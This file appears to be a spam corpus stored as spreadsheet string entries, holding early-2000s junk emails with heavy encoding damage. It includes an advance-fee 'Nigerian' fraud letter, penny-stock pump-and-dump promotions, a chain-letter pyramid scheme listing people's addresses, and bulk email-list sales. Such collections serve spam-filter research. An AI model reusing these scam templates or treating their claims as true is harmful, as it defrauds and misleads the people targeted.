  throughÂ email directly to the customersÂ who are interestedÂ in                   
  them,Â Â  this willÂ  bringÂ yourÂ                  
  businessÂ aÂ better chanceÂ of success.Â Xin.LanÂ  InternetÂ  MarketingÂ                    
Center,Â  hasÂ  many years ofÂ experience in developingÂ andÂ                   
utilizingÂ internet resources.We have setÂ upÂ globalÂ  businessÂ                    
email-addressÂ databasesÂ                    
whichÂ contain Â millionsÂ of email addresses of commercialÂ                    
enterprisesÂ  and consumersÂ                   
all over the world. TheseÂ emails are sorted byÂ countriesÂ                    
andÂ  fields. WeÂ also continuo-                  
uslyÂ  update Â ourÂ  databases,Â Â  addÂ  newÂ                    
addressesÂ  andÂ Â  remove Â undeliverableÂ  andÂ                   
unsubscribed addresses.
With the co-operation with our partners,Â  we                   
can supplyÂ valid targeted emailÂ addressesÂ                   
according Â toÂ  yourÂ  requirements,Â  byÂ  whichÂ  youÂ canÂ                    
easilyÂ  and Â directly Â contactÂ yourÂ                   
potentialÂ customers.With our help many enterprises and individualsÂ haveÂ greatly                   
raised                   
theÂ fame of theirÂ products or service and found many potential                   
customers.
We also supplyÂ aÂ  wide varietyÂ of software.Â  For example,                   
Wcast,Â  the software forÂ fast-                  
sending emails:this software is a powerfulÂ                    
InternetÂ  email-marketingÂ  applicationÂ  which                   
is perfect for individuals or businesses to sendÂ multiple customized                   
email messages to                  
their customers.
We are pleased toÂ offer youÂ our best prices :
Â Â Â Â Â Â Â Â Â                    
          EmailsÂ  orÂ  Software
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â                    
          Remarks
Â Â Â                    
          Price
30,000 targeted                   
          email addressesÂ We are able to supply valid targeted email addresses                   
          according to your requirements,Â  which are compiled  
          only on your order,                   
          such as region / country / field / occupation / Domain Name (such as AOL.com or   
          MSN.com) etc.Â                    
          USD 30.00Â 
Â Â Â Â                    
          Classified email addresses
          Our database contains more than 1600 sorts of email addresses,and can                   
          meetÂ your mostÂ stringent demands.
Â Â 
Â Â Â                  
          8 million email addresses
          8 million email addresses of global commercial enterprise
Â USD                 
          240.00Â 
Â Â Â Â Â Â Â                  
          Wcast softwareÂ 
          Software for fast-sending emails. This program can                 
        send mailÂ at a rate of over 10,000 emails per hour,                 
        and release informationÂ to                 
          thousands of people in a                 
        short time.
Â                  
          USD 39.00Â 
Â Â Â Â Â Â                  
          Email searcher softwareÂ 
Software for                 
          searching for targeted email addresses.Â                  
          USD 98.00Â 
Â Â Â Â Â Â Â                  
          Global Trade Poster
          Spread information about your business and your products to over 1500                 
          trade message boards and newsgroups.
Â USD                 
          135.00Â 
Â Â Â Â Â Â                  
          Jet-Hits Plus 2000 ProÂ 
          Software for submitting website to 8000+Â  search engines.
Â                 
          USD 79.00Â                
You mayÂ order the email listsÂ orÂ software directly from our                
website. ForÂ  further details,                
pleaseÂ refer to our website.
We will beÂ  honouredÂ  if you are interestedÂ  in our services or                
software. Please do not                
hesitate to contact usÂ with any queries or concern you may have.Â  WeÂ will                
beÂ happy toÂ                
serve you.               
Best regards!
Â Â Â Â Â Â Â Â Â Â Â Â                 
Â Kang Peng              
Marketing Manager
Http://www.como-verder.com
Sales@marketing-promote.com         
Xin.Lan Internet Marketing CenterYou are receiving this email because you               
registered to receive special offers from one of our marketingÂ               
partners.If you would prefer not to receive future emails, Â please               
click here toÂ  unsubscribe               
, or send a               
blank e-mail toÂ  Emaildata@88998.com--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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A:link {
    TEXT-DECORATION: none
}
A:active {
    TEXT-DECORATION: none
}
A:visited {
    TEXT-DECORATION: none
}
A:hover {
    COLOR: #0033ff; TEXT-DECORATION: underline
}
                                 For 
                                       Immediate ReleaseCal-Bay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25 cents 
      and should skyrocket to $2.66 - $3.25 a share in the near future. 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Research.RAPIDLY GROWING INDUSTRYÂ Industry revenues exceed $900 million, estimates indicate that there 
      could be as much as $25 billion from "smell technology" by the end of 
      2003.!!!!! CONGRATULATIONS 
      !!!!!Our last recommendation to buyÂ ORBT at 
      $1.29Â ralliedÂ and is holding steady atÂ $4.51!Â  
      Congratulations to all our subscribers that took advantage of this 
      recommendation.
ALL removes HONERED. Please allow 7 
      days to be removed and send ALL address to:
NeverAgain@btamail.net.cnÂ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</si>
  <si>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FIND PROSPECTS FOR YOUR BIZ/PRODUCTS...FAST !!DO YOU KNOW HOW TO USE E-MAIL?  Of course,
You're on the internet contacting friends and colleagues.
If you find sending e-mail easy and have failed at
promoting your business, or just simply want to reach a
" MASSIVE " amount of prospects, then you should be making 
money "HAND OVER FIST" with ELECTRONIC MAIL !!GET READ, GET EXCITED!!  Direct Email if carried
out properly, can make you money so fast it will make
your head spin!  There are " TONS " of responsive
buyers out there for just about anything you have 
to sell, and we have the means for you to contact
them directly.  We are dedicated to your success.
We guarantee that what you are about to do will
help you to UNLEASH A TIDAL WAVE OF
RESPONSES!THIS IS A ONE-TIME OFFER TO QUALIFIED
PROSPECTS AND WILL NOT LAST LONG FOR
THIS  " DREAM COME TRUE " E-MAIL PACKAGE
AT THE INCREDIBLE INVESTMENT OF $129.00
We will deliver to you e-mail addresses on the CD-ROM.
This will allow you to use these addresses IMMEDIATELY !1)  Receive the CD-ROMS  with (20,mil. incrediable)
     deliverable general Internet e-mail addresses
2)  The Elec...delivery software (Electronic Mailer)
     aka "THE CADILLAC."  #1 on-line today.
3)  #1 Money Makeing Opportunity On Line Today,
      Ready For "ELECTRONIC.. Mail Immediately....THIS IS VALUED AT OVER $400.00ON-LINE TODAY
(savings of $270.00), AND IF THAT'S NOT ENOUGH,
WE'LL EVEN THROW IN THE " INFORMATIONAL 
INSTRUCTIONS " ON MASS E-MAIL MARKETING.
YOU NEED TO GET STARTED QUICK !!WANT QUICK SERVICE?  YOU HAVE TWO (2) 
OPTIONS: 1)  For your convenience,  live operators
are available 9:00 am to 11:00 pm EST and would be
more than happy to take your call. CALL NOW:
Live Oper; (716) 812-2144
    Fax To:(253) 660-1235We accept Visa, Mastercard, Western Union(only) and check 
debit 24 hours a day, seven (7) days a week. 
please include your name as it appears on your check book
when paying by check, please include
the bank, check # and the long stream of numbers from
left to right that appear at the bottom of the check.  PLEASE
HAVE YOUR CHECK BOOK HANDY WHEN CALLING
TO PLACE YOUR ORDER.http://www.mailcomesandgoes.com/ang/service.html
If This Link Don,t Work Just Cut And Paste...Thanks !FIND PROSPECTS FOR YOUR BIZ/PRODUCTS...FAST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</si>
  <si>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me ,
News Letter
Â 
July 21, 2002
Greeting fellow Investors, 
Take a look at this inexpensive stock!Company Profile For:
        Â Â Â Â Â Â Â  VIRTUAL
        GAMING ENTERPRISES, INC..
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
        OTC:VTGEÂ For your investment consideration!
OTC:Â VTGE
Â 
With it's current price of $0.01 the company is currently
                trading way below its book value of $0.40/share. A Tremendous investment opportunity has presented itself
                with VTGE.Â  Legislation has been unsuccessful at slowing theÂ  growth of on-line
                gaming. The company is Way Undervalued!!!!
Â A minimal investment of $1000.00 would buy
        you 100,000 shares of VTGE at the current price!
If the stock moves up to even one fourth of what the
        company says it's current value is, 
your investment could be "Very Very Profitable!!!
Virtual Gaming Enterprises owns, operates, and licenses offshore
            casinos on the Island of Dominica. 
Â 
VIRTUAL GAMING
        ENTERPRISES, INC.
OTC: VTGE
Â 
Symbol:
VTGE
DATE:
7-21-2002
Price on
7-19-2002: $0.01
52 Week Range:
$0.0039 - $5.45 info obtained from
            bigcharts Â Share-Related Items
Â 
Recent Price (July,Â  19, 2002) 
$.01
Market Capitalization Approximate
$215k
Shares Outstanding Approximate
21.8M
Approximate Float
3.1 M
Daily Avg. Volume (50 day)
141K
Net Tangible Assets Approximate
$4M
Net Asset Value per Outstanding Share Approximate:
$0.40
Click here to view the chart:Â 
Audited
            Net Assets slightly under $4M.Net Asset Value per
            Outstanding Share of Common Stock is approximately $0.40/share.Strong
            Balance Sheet with no debt.New site enhancements
            and new marketing campaign beginning next quarter
Â 
VIRTUAL GAMING ENTERPRISES, INC.Â  THE COMPANY
Â 
Virtual Gaming Enterprises, Inc.,
        is in the business of gaming over the Internet. Customers are able to play virtual casino
        style games against other members or alone through an Internet connection. The company
        awards prizes and bonuses to its premier players in the same fashion as traditional
        casinos. These awards programs and unparalleled customer service have made Virtual Gamingâ€™s casinos the place to play on The Net. 
Check it out.
Â  www.thecasinothemepark.comÂ 
Â The company is
            enhancing its already popular casino suite of sites.The company recently
            signed a development agreement with regional site developer Infoflash.com.The company has
            retained Nextleft Tech. to launch an aggressive Marketing campaign.
Â 
Virtual Gaming
        Enterprises holds a Master Gaming License from the Commonwealth of Dominica. VTGE asserts
        it is well positioned to capture substantial market share of the growing Internet Gaming
        Business. A recent report from Bear Stearns (NYSE: BSC) experts expect on-line gaming to
        grow to more than $3 billion in 2002. VTGE, through joint ventures and an aggressive
        acquisition campaign, operates over 17 Gaming related websites and a 20% interest in Vegas
        Book.com, a traditional sports book.
Â 
The recent software
        development agreement with Infoflash.com gives the company a competitive technology
        advantage. Casino players will be will gamble using Flash and Java Games for Desktops and
        Laptops.Â  Furthermore, Virtual Gaming
        customers will have the ability to gamble using PDA (Personal Digital Assistants) and
        Pocket PCâ€™s.
Â 
THE MARKET
Â Â 
Virtual Gaming owns
        17 casino style gaming sites for simulated gaming over the Internet. The company is
        launching 5 new sites in 2002. 
Â 
According to International Data Corp.
        (IDC), improved Internet capabilities, next-generation video game consoles, and
        nontraditional gaming platforms will draw 40 million households into online gaming by
        2004, up from 25 million in 2000. Building a diversified revenue base is perhaps the
        biggest challenge facing online gaming companies. Virtual Gaming intends to earn
        additional revenues from licensing its technology and co-branding its games.
Â 
This company is trading
        way under its current value. 
VIRTUAL GAMING ENTERPRISES, INC., forcasts continued acceleration 
in revenues and in profits.
Â 
Â 
Projected Vital
        statistics of online casinos in 2002: 
Â 
Total
            online wagers - $13 billion per year Total
            wagers minus payouts - $651 million Number
            of online casinos - around 1700Average
            annual online casino revenue - $3 to $4 million 
Â 
Â Â Â Â Â Â Â Â  Good luck Investors!
Save 40%!
Save up to 40% on your
        internet access. Instead of the
        standard $21.95 to $28.95 Now you can get 24/7 unlimited access
        with nationwide access numbers on a fast
        56K, V.90 service. Faster connections
        than AT&amp;T and AOL, and faster page loads.
 "$16.99 internet
        access. 24/7 unlimited with nationwide access numbers."
Call 1-864-235-2716 .
SAFE HARBOR FOR FORWARD-LOOKING STATEMENTS Except for historical
        information contained herein, the statements on this website and newsletter are
        forward-looking statements that are made pursuant to the safe harbor
        provisions of the Private Securities Reform Act of 1995.
        Forward-looking statements involve known and unknown risks and uncertainties, which
may cause a company's actual results in the future periods to differ
        materially from forecasted results. These risks and uncertainties
        include, among other things, product price volatility, product
        demand, market competition and risk inherent in the companies operations. You can identify these statements by the fact that they do not relate strictly to
        historical or current facts. They use words such as
        "anticipate,'' "estimate,'' "expect,'' "project,'' "intend,''
"plan,'' "believe,'' and other words and terms of similar meaning
        in connection with any discussion of future operating or financial
        performance. As a suggestion, "Never, ever, make an investment
        based solely on what you read in an online newsletter or Internet bulletin board, especially if the investment involves a small, thinly-traded company that
        isn't well known," said Nancy M. Smith, Director of SEC's
        Office of Investor Education and Assistance. "Assume that the
        information about these companies is not trustworthy unless you can prove otherwise through your own independent research." "Internet Fraud"
        is available on the SEC's Web Site, at http://www.sec.gov/consumer/cyberfr.htmWe 
        strongly oppose the use of SPAM email and do not want to send our 
        mailings to anyone who does not Â wish to receive them. 
        If you do not wish to receive further mailings, please 
Click Here 
        and rest assured you will receive another message form us.        If you would like to subscribe to future mailing of this type please
        click here to subscribe
Â 
Â 
Â 
 [BJK9^":}H&amp;*TG0BK]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</si>
  <si>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Brand-New VERSION 7.0 Just Released:
Astounding New Software Lets You Find
Out Almost ANYTHING about ANYONE...
=============================================Download it right now (no charge card needed):For the brand-new VERSION 7.0, click here:
http://go21bt.let.to/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http://go21bt.let.to/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For the brand-new VERSION 7.0, click here:
http://go21bt.let.to/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found.For the brand-new VERSION 7.0, click here:
http://go21bt.let.to/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http://go21bt.let.to/ 
If you no longer wish to hear about future
offers from us, send us a message with STOP
in the subject line, by clicking here:
mailto:remv0615b@bk.ru?subject=STOP_GO21BT Please allow up to 72 hours to take effect.Please do not include any correspondence in your
message to this automatic stop robot--it will
not be read. All requests processed automatically. [BFRYTE^3247(^(PO1:KJ)_8J7BJK9^":}H]
</t>
  </si>
  <si>
    <t xml:space="preserve">
VistaPrint.com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t>
  </si>
  <si>
    <t xml:space="preserve">Give me 5 minutes and I will show you how
to turn your computer into a cash machine!!!(Available in the US and Canada)I earned $25,000 last month - send for my bank statements!!!We are giving away a FREE, 3-day vacation to all
folks who ask for more info on how to earn $1000
per sale simply by using their computer!You'll earn $1000 per sale on a low cost product and
$3000 per business contact - 
and all marketing is from the internet. Free
sophisticated and duplicatable marketing system
($2500 value) is given to you gratis - as well as ALL
training and marketing support!!!We invite you to explore, with no obligation, some
information that could turn around your
income and bring in thousands per week! If you just want some extra income, or if you are a 
seasoned marketer - our paint-by-numbers system with LIVE
support (up to 10:00 pm eastern every day!) will turn you
into a pro!!!Family-loved product!!!We will have you in profit QUICK - and with
constant, live FREE support!!!!REQUEST more free info NOW-
send an email to: growthmarkets@excite.com with "SEND INFO" in the subject line!!
(do NOT click REPLY!)**********************************************************
This email conforms to commercial email regulations within the US.
Please send any "remove" requests to: growthmarkets@excite.com
**********************************************************hqkudlnlusqgpxxmqaesrhrmvpjfykfg--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Protect your financial well-being.Purchase an Extended Auto Warranty for your Vehicle TODAY.Click Here for your free, Fast, no BS Rates NOW!!Car troubles and expensive repair bills always seem to happen at the worst possible time Dont they?. Protect yourself and your family with an ExtendedWarranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. We cover most vehicles with less than 150,000 miles.Our warranties are the same as the dealer offers but insteadyou are purchasing them direct!!!We offer fair prices and prompt, toll-free claims service. Get an Extended Warranty on your vehicle today.Click here today and we will include at no extra cost:24-Hour Roadside Assistance.Car Rental Benefits.Trip Interruption Benefits.Extended Towing Benefits.Click Here for your free, Fast, no BS Rates NOW!!Save now, don't wait until it is TOO LATE!We search for the best offering's foryou; we do the research and you get only The superior resultsthis email is brought to you by; KBR . To abnegateall future notices, Enter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</si>
  <si>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It costs nothing!TOP Life Companies Continue to Slash Rates 
Save up to 70% on your LIFE INSURANCE today! 
Term Insurance Comparisons 
Permanent (Whole/Universal) Life 
Burial/Final Expense 
Get
a Quote Here! 
Choose the coverage that 
Bests suits YOUR needs. 
Quotes from over 300 top rated companies 
Â We don't want anyone to receive correspondence
who does not wish too.Â  Just go to http://www.all-life/stopit
and you will not get any mail from us in the future.
. 11l2--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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FROM THE DESK OF:DR.OLUFEMI COKER,
ECONOMIC RECOVERY COMMITTEE,
FEDERAL SECRETARIAT, 
LAGOS-NIGERIA.						
FOR YOUR KIND ATTENTION,BUSINESS PROPOSAL: TRANSFER OF US$ 22.5 M (TWENTY TWO
MILLION, FIVE HUNDRED THOUSAND UNITED STATES DOLLARS)
&amp; BUSINESS INVESTMENTS PARTNERSHIP.First, I must solicit your strictest confidence in
this transaction, this is by  virtue of it's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administration.In the course of our work at the ERC, we discovered
this fund which resulted from gross re-valuation of
contracts  by top government officials of  the last
administration. The companies that executed the
contracts have been duly paid and the contracts
commissioned leaving the sum of US$22.5 Million
floating in the escrow account of the Central Bank of
Nigeria  ready for payment.I have therefore been mandated as a matter of trust by
my colleagues in the committee to look for an overseas
partner to whom we could transfer the sum of US$22.5M
legally subcontracting the entitlement to you/your
company. This is bearing in mind that our  civil
service code of conduct forbids us from owning 
foreign company or running  foreign account while in
government service hence the need for an overseas
partner.We have agreed that the funds will be shared thus
after it has been paid into your account:
(1) 25% of the money will go to you for acting as the
beneficiary of the fund.
(2) 5% has been set aside as an abstract projection
for reimbursment to both parties for incidental
expences that may be incurred in the course of the
transaction.
(3) 70% to us the government officials (with  which we
wish to commence an importation business in
conjunction with you ). 
All logistics are in place and all modalities worked
out for the smooth conclusion of the transaction 
within ten to fourteen days of commencement after
receipt of the following information:  Your  full
name/ company name, address, company's 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name.Please acknowledge the
receipt of this letter  using my personal E-mail
address.Yours Faithfully, DR.OLUFEMI COKER.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">MEET OTHER SINGLES 
            JUST LIKE YOU
Â 
Â 
Tired of searching 
            for love in all the wrong places?Find love now, the easy 
            way.Â 
Â JOIN FOR 
            FREEFind your soul mate today!BROWSE THROUGH 
            THOUSANDS OF PERSONALS IN YOUR OWN AREA.CLICK 
                        HEREto Find Love Now!
 Remove yourself from this recurring list by:Clicking here to send a blank email to unsub-7552100-336@mm53.comORSending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063This message was sent to address cypherpunks@einstein.ssz.com--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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ë¶€ë™ì‚°ì •ë³´ë‚˜ë¼Â Â 
ë¬¸ì˜ì „í™” 02-2613-1470 ë¶€ë™ì‚°ì •ë³´ë‚˜ë¼http://www.informland.co.kr 
            E-mail Â :total@informland.co.kr
ìˆ˜ì‹ ì„ 
      ì›ì¹˜ì•Šìœ¼ì‹œë©´ "
ìˆ˜ì‹ ê±°ë¶€
" ë¥¼ í´ë¦­ í›„ 
      "  ë³´ë‚´ê¸° " ë²„íŠ¼ ë¥¼ ëˆŒëŸ¬ ì£¼ì‹œê¸° ë°”ëžë‹ˆë‹¤[
ìˆ˜ì‹ ê±°ë¶€
]
Â Â 
Â 
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</si>
  <si>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Do you have a product or service to offer?
Would you like to reach Hundreds of Thousands of clients?
Want more sales or leads?If you own or operate a business then you must have 
said yes to one of these questions. We are a Bulk 
Email Company.We can get your message out to the masses. Fast, 
Affordable, Effective direct emailing services is what 
we offer. We specialize in getting  you more sales, leads, 
phone calls, emails and clients.We can send out Explosive Email Creatives or Simple 
Text (like this ad). We have been in this business for 
over 6 years. We know what it takes to get you the 
business and response rate you deserve.Contact us today for more infomation on our services. 24 Hour Special Buy One Million Email Blast
Get One Million Free! (New Clients Only)
General Delivery.
Contact Us: 1-248-708-6158
Call anytime for a fee quote or information. 
Targeted lists in stock.
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
If you have received this message in error and would
like to be removed from future mailings, please send and
email to removal1@btamail.net.cn with your email
address in the subject.. Please do not complain to
our removal box's host, it will only prevent others from
being able to be removed.
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
</t>
  </si>
  <si>
    <t xml:space="preserve">
For women ages 13 to 60 plus....
As seen on TV....
Safely Make Your Breasts
Bigger and Fuller 
In the privacy of your own home.Guaranteed quick resultsClick Here For Full Report
ugwwlrlujryqgveswijfmhb--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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CashIC.com ï¿½nternetten para kazandiran, en onemlisi Turkiye ye de odeme yapan bir sponsor. Uye olmak icin internetsitenizin olmasï¿½ da gerekmiyor, herkes uye olup para kazanabilir.
Uye olduktan sonra 6 degisik sekï¿½lde para kazanmaya basliyor ve her ay basinda ne kadar kazandiysaniz odemezi 10 gun ï¿½cï¿½nde cek olarak aliyorsunuz! Internetten para kazanmak istiyenler icin kacirilmamasi gereken bir firsat!!!
Attaki linke tï¿½kladiktan sonra acilan sayfadan "Join Now" yazan yere tiklayip acilan formu doldurun &amp; Kazanmaya baslayin !!!!
Click here:  http://www.clickXchange.com/er.phtml?act=153133.60---------------------------------------------------------------------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</si>
  <si>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To remove see below.I work with a company that submits
web sites to search engines and saw
your listing on the internet.We can submit your site twice a month
to over 400 search engines and directories
for only $29.95 per month.We periodically mail you progress
reports showing where you are ranked.To get your web site in the fast lane
call our toll free number below!Sincerely,Brian Waters
888-892-7537
* All work is verified
To be removed call: 888-800-6339 X1377
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi: Have 
  you been paying too much for your home or
  business long distance?
Have 
  you been looking for an affordable but honest
  long distance alternative?
We are offering 
  Fiber optic Long distance for
  as low as $9.95 per month!
Email 
  us with your phone number and we'll call you
  back so you can hear how great the connection is.  Six plans to choose from including a travel plan. There are no credit checks and because you don't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we'll
  call you back to confirm our crisp clear connection.  To be removed: click here2032UFYD2-959lOlR2290WEYy6-444nUHE5892loyf3-037iQUI9771WgxC8-113WmiB1248QRl70--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Easy to make "Between $200,000 and $500,000 every seven months
@font-face {
	font-family: Space Toaster;
}
@page Section1 {size: 8.5in 11.0in; margin: 1.0in 1.25in 1.0in 1.25in; mso-header-margin: .5in; mso-footer-margin: .5in; mso-paper-source: 0; }
P.MsoNormal {
	FONT-SIZE: 12pt; MARGIN: 0in 0in 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
}
LI.MsoNormal {
	FONT-SIZE: 12pt; MARGIN: 0in 0in 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
}
DIV.MsoNormal {
	FONT-SIZE: 12pt; MARGIN: 0in 0in 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "Times New Roman"; mso-style-parent: ""; mso-pagination: widow-orphan
}
A:link {
	COLOR: blue; TEXT-DECORATION: underline; text-underline: single
}
SPAN.MsoHyperlink {
	COLOR: blue; TEXT-DECORATION: underline; text-underline: single
}
A:visited {
	COLOR: purple; TEXT-DECORATION: underline; text-underline: single
}
SPAN.MsoHyperlinkFollowed {
	COLOR: purple; TEXT-DECORATION: underline; text-underline: single
}
SPAN.font041 {
	mso-bidi-font-size: 12.0pt; mso-style-name: font041; mso-ansi-font-size: 12.0pt
}
DIV.Section1 {
	page: Section1
}
Easy to make "Between 
$200,000 and $500,000 every seven months***Under Bill S.1618 
TITLE III passed by the 105th U.S. Congress this letter Can Not be 
Considered Spam as long as we include the way to be 
removed.//////////////////////////////////////////////////////////////////////////////This 
message is sent in compliance with the new e-mail bill: SECTION 301. Sender: 
"Per Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions to you 
by sender of this email may be stopped, at no cost to you, by sending a reply to 
this email address with the word "remove" in the subject 
line."///////////////////////////////////////////////////////////////////////////////Dear 
Friends AS SEEN ON NATIONAL 
TV:Â  Making over half million 
dollars every 4 to 5 months from your home for an investment of only $25 U.S. 
Dollars expense one time THANK'S TO THE COMPUTER AGE AND THE INTERNET 
!==================================================BE IN GOOD MONEY WITHIN A YEAR!!!Before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legal.Their findings proved once and for all that there are ''absolutely 
NO Laws prohibiting the participation in the program and if people can -follow 
the simple instructions, they are bound to make some money with only $25 out of 
pocket cost''. DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT 
THIS PROGRAM HAS ATTAINED,Â  IT IS 
CURRENTLY WORKING BETTER THAN EVER.This is what one had to say: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Jersey.===================================================Here 
is another testimonial: "This program has been around for a long time 
but I never believed in it. But one day when I received it again in the mail I 
decided to gamble my $25 on it. I followed the simple instructions and walaa 
.... 3 weeks later the money started to come in. Â The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anything."More 
testimonials later but first,===== PRINT THIS NOW FOR YOUR FUTURE 
REFERENCE 
======$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$If 
you would like to make at least $500,000 every 4 to 5 months easily 
andcomfortably, please read the following...THEN READ IT AGAIN and 
AGAIN!!!$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$FOLLOW 
THE SIMPLE INSTRUCTION BELOW AND YOUR FINANCIAL DREAMS WILL COME TRUE, 
GUARANTEED! INSTRUCTIONS:=====Order all 5 reports shown on the list below 
=====For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE 
REPORTYOU ARE ORDERING and YOUR E-MAIL ADDRESS to the person whose name 
appears ON THAT LIST next to the report. MAKE SURE YOUR RETURN ADDRESS IS ON 
YOUR ENVELOPE TOP LEFT CORNER in case of any mail problems.=== When 
you place your order, make sure you order each of the 5 reports.Â  You will need all 5 reports so that you 
can save them on your computer and resell them. YOUR TOTAL COST $5 X 
5=$25.00.Within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computer.IMPORTANT - DO NOT alter the names of 
the people who are listed next to each report, or their sequence on the list, in 
any way other than what is instructed below in step '' 1 through 6 '' or you 
will lose out on a majority of your profits. Once you understand the way this 
works, you will also see how it does not work if you change it. Remember, this 
method has been tested, and if you alter it,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you.Â  Remember, honesty reaps the 
reward!!!1.... After you have ordered all 5 reports, take this 
advertisement and REMOVE the name &amp; address of the person in REPORT # 5. 
This person has made it through the cycle and is no doubt counting their 
fortune.2.... Move the name &amp; address in REPORT # 4 down TO REPORT # 
5.3.... Move the name &amp; address in REPORT # 3 down TO REPORT # 
4.4.... Move the name &amp; address in REPORT # 2 down TO REPORT # 
3.5.... Move the name &amp; address in REPORT # 1 down TO REPORT # 
26.... Insert YOUR name &amp; address in 
the REPORT # 1 Position. PLEASE 
MAKESURE you copy every name &amp; address 
ACCURATELY!==========================================================**** 
Take this entire letter, with the modified list of names, and save it on your 
computer. DO NOT MAKE ANY OTHER CHANGES.Save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going:METHOD # 1: BY SENDING BULK E-MAIL 
LEGALLY==========================================================Let's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2.Those 100 
people mail out 5,000 e-mails each for a total of 500,000 e-mails.Â  The 0.2% response to that is 1000 orders 
for Report # 3.Those 1000 people send out 5,000 e-mails each for a total 
of 5 million e-mails sent out. The 0.2% response to that is 10,000 orders for 
Report # 4.Those 10,000 people send out 5,000 e-mails each for a total 
of 50,000,000 (50 million) e-mails. The 0.2% response to that is 100,000 orders 
for Report #5 THAT'S 100,000 ORDERS TIMES $5 EACH=$500,000.00 (half 
million).Your total income in this example is: 1..... $50 + 2..... $500 
+ 3..... $5,000 + 4.... $50,000 + 5..... $500,000Â  
Grand Total=$555,550.00NUMBERS DO NOT LIE. GET A 
PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO MATTER HOW 
YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY 
!=========================================================REMEMBER 
FRIENDS, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING OUT OF 5,000 YOU MAILED 
TO.Â  Dare to think for a moment what 
would happen if everyone or half or even one 4th of those people mailed 100,000 
e-mails each or more? There are over 150 million people on the Internet 
worldwide and counting. Believe me, many people will do just that, and 
more!METHOD #2: BY PLACING FREE ADS ON THE 
INTERNET=======================================================Advertising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AVAILABLE REPORTS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address.PLACE YOUR ORDER FOR THESE 
REPORTS NOW!!====================================================
REPORT # 1: The Insider's Guide to Advertising for 
Free on the NetOrder Report #1 from:B.H.218 TimberwoodIrvine, 
CalÂ  92620
USA
Â ________________________________________________________REPORT 
# 2: The Insider's Guide to Sending Bulk E-mail on the NetOrder 
Report # 2 from:Â J.B. 
Erhart722 10th StreetPaso Robles, CA. 
93446USA_________________________________________________________________REPORT 
# 3: Secrets to Multilevel Marketing on the NetOrder Report # 3 
from:S.W.131 E. EdenFresno, Cal. 
93706USA______________________________________________________________REPORT 
# 4: How to Achieve Financial Independence in a Global 
Economy
Order Report # 4 from:F.L.
225 Bridlecreek Park S.W.
Calgary, Alberta, CA
T2Y 3P1
________________________________________________________________REPORT 
#5: How to Send Out 0ne Million Emails For FreeOrder Report # 5 
from:
K.H.
2025 Red River Road
Sykesville, MDÂ  
21784
USA________________________________________________________________________
$$$$$$$$$ YOUR SUCCESS 
GUIDELINES $$$$$$$$$$$Follow these guidelines to guarantee 
your success:=== If you do not receive at least 10 orders for Report #1 
within 2 weeks, continue sending e-mails until you do.=== After you have 
received 10 orders, 2 to 3 weeks after that you should receive 100 orders or 
more for REPORT # 2. If you did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report.You can KEEP TRACK of your PROGRESS by watching which report 
people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHER 
BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN.Â  There is NO LIMIT to the income you can 
generate from this business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now.Remember to e-mail a copy of this exciting report after you have put 
your name and address in Report #1 and moved others to #2 ...........# 5 as 
instructed above. One of the people you send this to may send out 100,000 or 
more e-mails and your name will be on every one of them.Â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''hobby''.Â  Mitchell Wolf M.D., 
Chicago, 
Illinois======================================================''Not 
being the gambling type, it took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big."Â  Dan Sondstrom, Alberta, 
Canada=======================================================''I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weeks."Â  Susan De Suza, New York, 
N.Y.=======================================================''It 
really is a great opportunity to make relatively easy money with little cost to 
you. I followed the simple instructions carefully and within 10 days the money 
started to come in. My first month I made $20,560.00 and by the end of third 
month my total cash count was $362,840.00. Life is beautiful, Thanx to 
internet.".Â  Fred Dellaca, Westport, 
New 
Zealand=======================================================ORDER YOUR REPORTS TODAY AND 
GET STARTED ON'YOUR' ROAD TO FINANCIAL FREEDOM 
!Â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</si>
  <si>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Save up to 80
Save
up to 80%
On Â Dental
Â ServicesOnly
                    $19.95 per month, per Household
Or
                    $11.95 per month for
                    individual......
Â 
No Waiting Period
No Limits on Visits or Services
Orthodontics Included
Cosmetic Dentistry Included
Pre existing Conditions Convered
No Deductibles...No Claims Forms
No Age Limits
All Specialist Included
Value
                    Added Benefits FREE with your Discount Dental ServicesFREE
                        Vision Care Plan ... Over 12,000 Providers Nationwide
FREE
                        Discount Prescription Drug Card ... Over 50,000 Retail
                        Pharmacy Locations
FREE
